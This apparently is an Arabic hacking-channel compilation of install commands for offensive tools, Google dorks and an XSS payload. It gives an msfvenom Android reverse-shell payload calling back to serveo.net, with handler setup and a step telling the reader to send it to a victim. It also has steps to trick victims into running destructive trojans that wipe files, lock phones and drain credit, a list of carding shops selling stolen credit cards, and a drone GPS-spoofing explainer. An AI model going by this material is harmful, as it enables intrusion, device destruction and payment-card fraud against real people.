4- اداة checkURL


git clone https://github.com/UndeadSec/checkURL.git

cd checkURL

python3 checkURL.py
مثلا

python3 checkURL.py --url CS.com

او

python3 checkURL.py --url CS.com --check-url
او

python3 checkURL.py --url-list CS.txt

او

python3 checkURL.py --url-list CS.txt --check-url


#CS

inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchst­ring="
inurl:".php?keyword=­"
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback­="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostol­d/feedpost.php?url=
inurl:scrapbook.php?­id=
inurl:headersearch.p­hp?sid=
inurl:/poll/­default.asp?catid=
inurl:/­search_results.php?se­arch=


xp : http://host/php/index.php?lang=[XSS]
POP: http://host/php/index.php?lang=<center><h1>XSS BL4CKH4T G4N3$H GROUP</h1></center>

#CS

1 - اداة Clickjacking-Tester

هي اداة حلوة وبسيطه هي بتعمل ليك اسكان للموقع اذا كان مصاب بثغرة او لا
لمجموعه مواقع

اوامر التثبيت


$ apt update && apt upgrade

$ apt install git

$ apt install python2

$ apt install python

$ git clone https://github.com/D4Vinci/Clickjacking-Tester

$ cd Clickjacking-Tester

$ chmod +x *


$ python3 Clickjacking-Tester.py file.txt




ال file.txt هاذي للسته تحتوي مجموعه مواقع
بعدا راح يطلع ل output

#CS

2- اداة Cr3dOv3r


git clone https://github.com/D4Vinci/Cr3dOv3r.git

cd Cr3dOv3r

python3 -m pip install -r requirements.txt


python3 Cr3d0v3r.py -h

#ملحوظه استخدمو python او python3

مهمه الاداة تعمل فحص ل الاميل اذا كان مرتبط ب حسابات اخري او لا
مثلا اذا كان مرتبط ب facebook او تويتر و غيرها
وله العديد من المميزات الاخري

#CS

3- One-Lin3r اداة

git clone https://github.com/D4Vinci/One-Lin3r.git

apt install libncurses5-dev
pip3 install ./One-Lin3r
one-lin3r -h


تهتم ب استغلالات الويندوز و الماك و لينكس طريقه عملها اقرب ل الميتا

إكتفوها..

#CS

4- اداة Exbox



$pkg install git

$ pkg install curl

$ git clone https://github.com/Mr-XsZ/Exbox

$ cd Exbox

$ bash install.sh

مميزاتها بالصورة بالاسفل


#CS

2- اداة Crips

[✓] git clone https://github.com/Manisso/Crips.git

[✓] cd Crips && python Crips.py

[◉] 0 : INSTALL & UPDATE

[◉] -> 0

[✓] press 0

[✓] Congratulation Crips is Installed !
مميزاتها


Whois lookup
Traceroute
DNS Lookup
Reverse DNS Lookup
GeoIP Lookup
Port Scan
Reverse IP Lookup
INSTALL & UPDATE
Exit


#CS

5- اداة
AndroBugs Framework
هو نظام لتحليل الثغرات الأمنية في Android يساعد المطورين أو المتسللين على إيجاد ثغرات أمنية محتملة في تطبيقات Android. لا واجهة واجهة المستخدم الرسومية الرائعة ، ولكن الأكثر كفاءة (أقل من دقيقتين لكل مسح في المتوسط) وأكثر دقة.


طريقه تبيتها

$ apt install git

$ apt install python2

$ apt install python

$ git clone https://github.com/AndroBugs/AndroBugs_Framework

$ python androbugs.py -f [APK file]

معرفه طريقه عملهاا
python androbugs.py -h


#CS

اقدم لكم اداة || VirusCrafter || اداه جديده وقويه لصنع تطبيقات الفيروس على شكل برامج اندرويد هذه الفيروسات خطيره انتبهوا بعد القيام بصناعتها تثبيتها بجهازكم الاندرويد منها فورمات ومنها حرق المعالج ومنها سحب رصيد الجوال
( 18 ) فيروس APK بالاداه



$ pkg install python2

$ pkg install wget

$ pkg install figlet

$ gem install lolcat

$ git clone https://github.com/herp1337/VirusCrafter.git

$ cd VirusCrafter

$ python2 ViruzCrafter.py

📋 ملاحظه مهمه :
بعد الانتهاء من صنع الفيروس توجه الى ملفاتي بجهازك sdcard وراح تلاقي تطبيق الفيروس هناك .. الاداه لاتحتاج نقل الفيروس من termux الى sdcard ( ملفاتي ) يتم نقلها اوتوماتيكيا الى sdcard

#CS

السلام عليكم ورحمة الله وبركاته

 
1- pkg install openssh

 
2 - ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net

صفحه جديدة  تكتب أوامر الميتا


و نكتب اوامر عمل البايلود
اولا :


cd metasploit-framework
(ملحوظه ::  هذي إذا كانت الملف تبع الميتا مظهر تكتب الأمر السابق  )

و بعدها

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/CS.apk




ثانيا نفتح اداة الميتاسبلويت بالامر
./msfconsole

ثالثا بعد الدخول علي الميتاسبلويت نكتب الاوامر

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 4444

exploit
 
قم بإرسال ارساله للضحية
و بعدها يصلك تبليغ  وتفتح الجلسه عندك
  
أوامر التحكم تكتب help أو ?



 
#CS

السلام عليكم
اليوم كما وعدناكم شرح مفصل عن اختراق الطائرات بدون طيار

تتميز الطائرة بدون طيار بميزات تجعلها تتفوق على غيرها من وسائل الطيران الاخرى
فأهم امر هو تقنية الارسال اللحظية وعدم التعرض للمخاطر البشرية ولكن كل شيء وله سلاح ذو حدين
فاذا تم اسقاطها او الحصول عليها فهذا يعني بنسبة كبيرة بناء نظام مشابه لها عن طريق الهندسة العكسية
أبرز عمليات اسقاط طائرات الاستطلاع
اسقاط كتائب القسام طائرة
skylark1
اسقاطر طائرة الاستطلاع الامريكية عن طريق الجيش الالكتروني الايراني
RQ170
اسقاط كتائب القسام لطائرة
skylite B
اولا: كيف تعمل الطائرة بدون طيار ؟
الطائرات بدون طيار تعمل على قاعدة الكترونية متنقلة او ثابتة وذلك حسب مواصفات الطائرة ان كانت حاملة لصواريخ او لاغراض تجسسية
وحسب خبرتي المتواضعه
القواعد الثابتة :تكون للطائرات الثقيلة الحاملة للصواريخ
القواعد المتنقلة: جهاز صغير يتحكم به عن بعد ويمكن وضعه في حقيبة صغيرة كطائرة الاستطلاع سكاي لايت
ولكن هناك بعض الطائرات الثقيلة التي لا تحمل صواريخ او قاذف مثل
RQ170
يعتمد هذا النوع على انتشار الامواج الكهرومغناطيسية بشكل كبير وذلك لضمان زيادة مدى جمع المعلومات
طائرات الاستطلاع المتوسطة تستطيع التحليق على ارتفاع 50.000 قدم .
ويمكن التحكم بها من خلال قاعدة مركزيه حيث يمكنها تزويد المتحكم بالمعلومات الحيًة التي تقع تحت الطائرة مباشرة
ثانيا :كيف يتم اتصال طائرة الاستطلاع بالقاعدة الالكترونية
يتم اتصال الطائرة بالقاعدة الالكترونية عن طريق وضعين
1- الوضع الأول Ground command Station
هذا الوضع يتم التحكم به عن طريق القاعدة المباشرة التي يشرف عليها المهندس الاختصاصي في القاعدة العسكرية وعن طريقه يمكن ارسال الأوامر واستقبالها براحة تامة
2- الوضع الثاني ALR – Automatic Launch and recovery
هذا الوضع مبرمج آليا على الذهاب والاياب لاماكن متعددة في ساعات معينة
كأن تبرمجه على الذهاب في الساعه 6 صباحا لمكان معين والعودة في الساعه 10 على مكان معين وترك الطائرة بدون التحكم بها عن طريق القاعدة الالكترونية
ولكن كيف يتم اختراق طائرات الاستطلاع ؟
في حقيقة الامر اغلب التقنيين والمهندسين يعتقدون ان ذلك يتم عن طريق الهندسة العكسية ولكن ليس هذا حقيقة الامر
ولكن هذا لا ينكر انه ممكن ان يتم عن طريق الهندسة العكسية فهي كفكرة قائمة ولكن ما يصعب الامر حقيقة فك تشفير قنوات الاتصال بين ارسال الطائرة والقاعدة
في جميع حالات اسقاط الطائرات من دون طيار تمت عن طريق ما يسمى
GPS spoofing
ما هو هجوم GPS spoofing؟
في بداية الامر لنجاح اسقاط الطائرة بدون طيار يتوجب قطع الاتصال بين الطائرة والقاعدة لضمان عدم تحكمها بالقاعدة سواء ثابتة او متحركة
يتم قطع الاتصال عن طريق جهاز
SNG(Satellite News Gathering)
هذا جهاز عبارة عن جهاز مرسل وهو متوفر وغالبا ما يستخدم في القرى النائية للبث
يمكننا استخدام هذا الجهاز بتوليد اشارات بنفس الترددات بطاقة اعلى من الاشارة العادية مما يسبب التشويش وبالتالي قطع الاتصال
وهنا يأتي الدور الجوهري في تلخيص الاسقاط
كما تحدثنا مسبقا في اوضاع الاتصال بالقاعدة الالكترونية فان الطائرة مبرمجة لان تهبط في قاعدتها المخصصة ولو تم قطع الاتصال عنها فهي مبرمجة على شيء مسبق
هنا يجب علينا استخدام GPS spoofing
لكل طائرة احداثيات للهبوط
X.Y
X.Y=5.6
فهجوم ال SPOOFING
عبارة عن تضليل في الترجمة
GPS spoofing
يتم الهجوم على طائرة الاستطلاع وتغير الاحداثيات
X.Y=5.6 Chang To x.Y=12.7
ويتم اسقاطها حسب مكان احداثيات جهاز الملاحة وبذلك تصبح الطائرة في ارض المهاجم:) ( اي يتم اسقاطها ) .


اختراق الطائرات بدون طيار

اداة DUMPit

هو استغلال لتطبيق SHAREit للجوال حيث يسيء استخدام ثغرتين تم اكتشافهما مؤخرًا وتؤثر على تطبيق SHAREit Android <= v 4.0.38. الأول يسمح للمهاجم بتجاوز آلية مصادقة جهاز SHAREit ، والآخر يمكّن المهاجم المصادق من تنزيل الملفات التعسفية من جهاز المستخدم. تم الإبلاغ عن كلا الثغرات الأمنية للبائع وتم إصدار تصحيحات.



اول شي قم بالدخول ع termux و بعدها
اكتب الاوامر التاليه بالترتيب


pkg install git python2

git clone https://github.com/redforcesec/Dumpit.git

cd Dumpit

python2 server.py


#CS

فيروس جيماكسوجان باصداره الخامس ، هو ملف طرواده مشفر يقوم:

١) بحذف جميع ملفات و مسارات جهاز الضحية.

٢) بإظافه ١٠ جيجا في جهاز الضحية في غضون بضع ثوان.

٣) يقوم بانشاء ٣٠٠٠ مجلد بجميع الحروف و الارقام في كل المسارات.

٤) يقوم بتهنيج و تجميد جهاز الضحية ل٦ ساعات.

خطوات التنصيب ، كم بإقناع الضحية ان يحمل برنامج Termux من متجر بلاي علا انه يقوم بالتهكير و ما الى ذلك ، ثم قم بجعله ان يكتب هذه الاوامر:

pkg update

pkg upgrade

pkg install git

git clone https://github.com/jmaxojan/jmaxojan5

cd jmaxojan5

bash *


و اذا اردت المزيد من التدمير ، قم بجعل الضحية ان ينفذ هذه الاوامر اولا:

bash .install.sh

سيقوم بنقل برنامج الى الذاكره الداخلية في المسار sdcard/ اسمه TermuxApi قم بجعل الضحية ان يثبته و يدخل الى اعدادات الجهاز>التطبيقات>Termux Api و يقوم بتفعيل جميع الاذونات و الصلاحيات للبرنامج ثم يقوم بتنفيذ الامر السابق * bash , لان ذلك سيقوم (اظافه للاشياء التي ذكرتها مسبقا) :

١) بحرق فلاش الضوء.

٢) بتدمير الاضاءه.

٣) بتغيير الخلفية.

٤) بهز الجهاز لمده ٦ ساعات بدون توقف.

٥) بالاتصال الهاتفي لارقام بدون شعور الضحيه بذلك لكي يتم سحب الرصيد.

٦) بتشغيل صوت جنس في الخلفيه 👺.

٧) باقفال الجهاز برمز سري.

٨) بحذف ما هو موجود في الحافظه.

٩) بحرق الصوت.

١٠) بحذف الاشعارات.

١١) بإيقاف و تشغيل الوايفاي عده مرات.

... ارجو استخدام الفيروس علا الاجانب او علا من يستحق ...

11- اداة webkiller


git clone https://github.com/ultrasecurity/webkiller.git

cd webkiller

pip install -r requirements.txt
python webkiller.py


#مميزات_الاداة

1 - Reverse IP With HackTarget
2 - Reverse IP With YouGetSignal
3 - Geo IP Lookup
4 - Whois
5 - Bypass CloudFlare
6 - DNS Lookup
7 - Find Shared DNS
8 - Show HTTP Header
9 - Port Scan
10 - CMS Scan
11 - Page Admin Finder
12 - Robots.txt
13 - Traceroute
14 - Honeypot Detector
15 - Ping
16 - All
17 - Exit

#CS

اداة DUMPit

هو استغلال لتطبيق SHAREit للجوال حيث يسيء استخدام ثغرتين تم اكتشافهما مؤخرًا وتؤثر على تطبيق SHAREit Android <= v 4.0.38. الأول يسمح للمهاجم بتجاوز آلية مصادقة جهاز SHAREit ، والآخر يمكّن المهاجم المصادق من تنزيل الملفات التعسفية من جهاز المستخدم. تم الإبلاغ عن كلا الثغرات الأمنية للبائع وتم إصدار تصحيحات.



اول شي قم بالدخول ع termux و بعدها
اكتب الاوامر التاليه بالترتيب


pkg install git python2

git clone https://github.com/redforcesec/Dumpit.git

cd Dumpit

python2 server.py


#CS

اداة hackerpro

طريقه تثبيتها

apt update && apt upgrade && apt install git && apt install python2

git clone https://github.com/technicaldada/hackerpro.git

cd hackerpro && python2 hackerpro.py

مميزات الاداة

Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKERPRO

#CS

اداة pureblood

اوامر تثبيتها

apt update

apt upgrade

apt install git

apt install python

apt install python2

git clone https://github.com/cr4shcod3/pureblood

cd pureblood

chmod +x pureblood.py

pip install -r requirements.txt

python pureblood.py

مميزات الاداه كثيرة جدا جدا اكتشفوها ب انفسكم

#CS

هذه  أفضل المواقع لشراء CC for Carding في 2019

(لبطاقات الائتمان الأمريكية فقط)
cvv.me
ltdcc1.ru
dumps.su
2pac.cc
feshop-card.ru
uniccshop.ru
torcvv.cc
validshop.succstore.su
approved1.su
bigbase1.lv
bstab.net
buyst0re.bz
buyacc.us
c2v2.net
carderpro.com
cardersbay.in
cardrockcafe.cc
cardsmarket.su
cardstorm.ru
ccbase.biz
ccbases.com
ccbases.net
ccbases.su
ccchecker.ru
ccdumb.cc
ccv.name
cvv-shop.ru
cvv-store.su
cvvseller.pro
cvvshop.lv
cvvshop.net
cvvshop.su
cvvshop1.com
cvvshop1.lv
cvvshop1.ru
cvvstore.ru
d4rksys.cc
dumps44.cc
dumpscheck.us
dumpsgate.su
freshbase.org
fullz.pro
galaxycvv.ru
galaxycvv.su
greatdumps.cc
greatdumps.su
greatdumpz.su
hackedcvv.su
instantcvv.ru
jbestcc.ru
kidala.info
kingscard.ru
kingscard.su
lampeduza.su
logoshopcc.net
ltdcc.cc
n1shop.su
nonvbv.com
nonvbv.ru
nonvbv.su
octavian.su
omerta.cc
pentagon.al
pirates-cc.com
pirates-cc.ru
pompei.su
procvvshop.ru
project84.su
rafanji.com
rescator.ru
rescator.so
rescator.su
reskator.la
secinfo.su
secretshop.su
selldump.su
shop-cvv.ru
shopcvv.ru
slilpp.net
source4dumps.cc
sruka.cc
sruka.su
ssnfinder.su
swiped.ru
t12shop.cc
thefreshcc.com
thefreshdumps.com
torcvv.com
track2shop.com
trackmarket.pro
uniccshop.su
uniccshops.ru
v-m.name
validcard.org
validcvv.ru
validcvv.su
validdumps.su
validshop.su
verified.cm
worldcvv.com
worldcvv.ru
l33t.su

#CS

8- اداه XeroSploit

لإختبار إختراق الأجهزة المتصلة بالشبكة وتعتبر من الأدوات التي تهدف لأداء هجمات MITM Attack (رجل بلمنتصف) لإختبار الإختراق وهو يجمع العديد من العمليات التي تسمح لتحقيق الهجمة بفعالية ويسمح بعمل هجمة الحرمان DosAttack كما يقوم بعمل مسح للمنافذ كلها.


اوامر تثبيت

git clone https://github.com/LionSec/xerosploit

cd xerosploit

sudo python install.py

sudo xerosploit

المميزات
1- Port scanning
2- Network mapping
3- Dos attack
4- Html code injection
5- Javascript code injection
6- Download intercaption and replacement
7- Sniffing
8- Dns spoofing
9- Background audio reproduction
10- Images replacement
11- Drifnet
12- Webpage defacement


#CS

12 - اداه ghostnet

البرنامج الذي سيساعدك على أن تكون أكثر أمانًا على شبكة الإنترنت. تم تصميم هذا البرنامج للتوجيه بشفافية عبر tor ، وبالطبع ، سيتم تشغيل حركة مرور الشبكة تحت tor. تم تعديل هذا البرنامج بالفعل للعمل على ARCH linux مع توزيعات linux الأخرى ، لدينا AnonSurf و BacBox-مجهولان ، وهما يعملان أيضًا مثل هذا البرنامج. هذا البرنامج كتبه لغة بيثون (الإصدار 3).


اوامر تثبيتها

git clone https://github.com/t7hm1/GhostNET.git && sudo cp GhostNET/ghostnet /usr/bin/ghostnet
cp GhostNET/ghostnet.log /opt/
sudo chown (your user name):wheel /opt/ghostnet.log
sudo chmod +x /usr/bin/ghostnet
sudo ghostnet


#cs

14- اداه prank
عمل اتصال

$ pkg update -y
$ pkg upgrade -y
$ pkg install git
$ pkg install php
$ git clone https://github.com/siputra12/prank
$ cd prank
$ ls
$ php call.php (Untuk Telepon)
$ php wa.php (Untuk Spam Buka Lapak)

ملحوظه الاداه ما اشتغلت معي

#CS